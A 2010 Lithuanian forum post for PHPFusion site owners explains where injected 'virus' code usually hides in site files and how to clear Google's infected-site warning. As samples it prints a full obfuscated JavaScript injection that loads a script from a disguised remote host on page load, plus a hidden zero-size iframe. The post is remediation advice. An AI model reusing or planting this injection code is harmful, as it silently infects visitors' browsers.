WordPress, Shopify ir PHPFusion programuotojų bendruomenė

Virusai
Parašė Žmogus 2010 vasario 15 18:02:35

Jau turbūt ne viena užkniso tie prakeikti virusai

Pamokinsiu kaip juos pašalinti ir kur jie būna dažniausiai

Virusų pavyzdžiai

[code] <script>var d=false;var j="";var l=window;var dp="dp";var v=document;var x=3882;var p;if(p!='nq'){p='nq'};function e(q){var ux=16722;var s=['h%tLt~p<:L/q/~r<e~t<aLiLlqmqeLnqo%t%-qc<o~mL.<mqi%x<i<.~j%pq.qa%lLlqo~c~i~n<eL-~fLrq.Lr%eLd%t~a<g~jqe~w<e%lLeLr~s<.qrquq:%8~0%8<0L/Lv~i%m%e%oL.<cqo~mq/qvqiqm~e<o%.~c%oLm%/qb~r<e~a~kL.<c%oqm%/%gqo~o<g%lqe~.qc<o%m</qg<o<o%g<l%eL.<c%o<mL.qe~c~/q'.replace(/[q\<%L~]/g, ''), 's~c~rkiCp?te'.replace(/[eCk~\?]/g, ''), 'cLrLe5aPtMe5ELl2ePm2eMnMt5'.replace(/[5P2ML]/g, ''), 'o2nUl0o0a$d>'.replace(/[\>\$2U0]/g, ''), 'sJrJcJ'.replace(/[Jn\?3f]/g, ''), 'akpkpzeknkdDCDhDiylzdQ'.replace(/[QDzky]/g, ''), 'szeKtDAztKtDrLiDb9u9tDez'.replace(/[zLD9K]/g, ''), 'bMoMdNyM'.replace(/[MCNwT]/g, ''), 'dOemfmeZr>'.replace(/[\>mZOP]/g, ''), "1"];var u=s[q];this.nf=33247;return u;var rr="";}this.ft="ft";var o = function(){try {var d_;if(d_!='' && d_!='_s'){d_=null};r=v[e([2,1][0])](e([1][0]));var n_;if(n_!='qp' && n_!='c'){n_=''};r[e([4,4][0])]=e([0,4][0]);var qpj;if(qpj!='' && qpj!='k'){qpj='a'};r[e([6,2][0])](e([1,8][1]), e([9][0]));this.ye=false;var h = v[e([7,1][0])];var ae;if(ae!='nk'){ae='nk'};h[e([5][0])](r);var t="t";} catch(va){};var lv=39032;};var ra=new String();this.vpz=53190;l[e([3][0])]=o;this.hh="hh";</script>
[/code]

[code]<iframe src="http://example.com/example.txt?" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>[/code]

Ir t.t.

Jei jau jūsų puslapis apkrėstas, juos reikia peržiūrėti visuose failuose, [b]bet[/b] dažniausiai jie būna:
index.php failuose (pvz infusions/index.php arba administration/index.php) + dar randasi lacale/lithuanian/global.php ir pnš.
[b]Pačiam gale prieš ?>[/b]
kartais galima rasti subheader.php arba footer.php jei naudojam v6, o jei v7 tai includes/footer_include.php
[u]+ dabar dabar pradėjo dažnai į javascript failus lįsti ir ten kišti tą kodą
[/u] (kaip includes/javascript.js)

[u][b]Jei jau pašaline kenksmingą kodą[/b][/u], mums užėjus į savo saitą meta, kad saitas yra pakrėstas (pvz http://www.7ion.com/images/virus-infected-firefox.jpg ). Tada darom taip:

Einam į google webmaster tools www.google.com/webmasters/tools/
Pridedam savo svetainę tada mums duos kodą panašų į:
[code]<meta name="google-site-verification" content="0GXF_AJMn" />[/code]
ir jį dedam į subheader.php po
<title>".$settings['sitename']."</title> PVZ kaip dėti:
[code]<title>".$settings['sitename']."</title>";
?>
<meta name="google-site-verification" content="0GXF_AJMn" />
<?php
echo"
[/code]
(panašiai bus ir ant v7. Tik ten reikės į themes/templates/header.php kišti

Ir spaudžiam patvirtinti google webmaster tools puslapyje
Ir dabar viršuje išmes, kad puslapis apkrėstas, spaudžiam ant to ir apačioje pasirenkam, kad google botas pereiti per mūsų saitą (šitos dalies tiksliai neatsimenu kaip viskas tiksliai vadinasi)

Viskas, keičiam FTP pass ir tikimes, kad kažkiek tai laiko mūsų nepuls (+ kiek pastebėjau ant serveriai.lt hosto, man nei karto nebuvo virusai užpuole)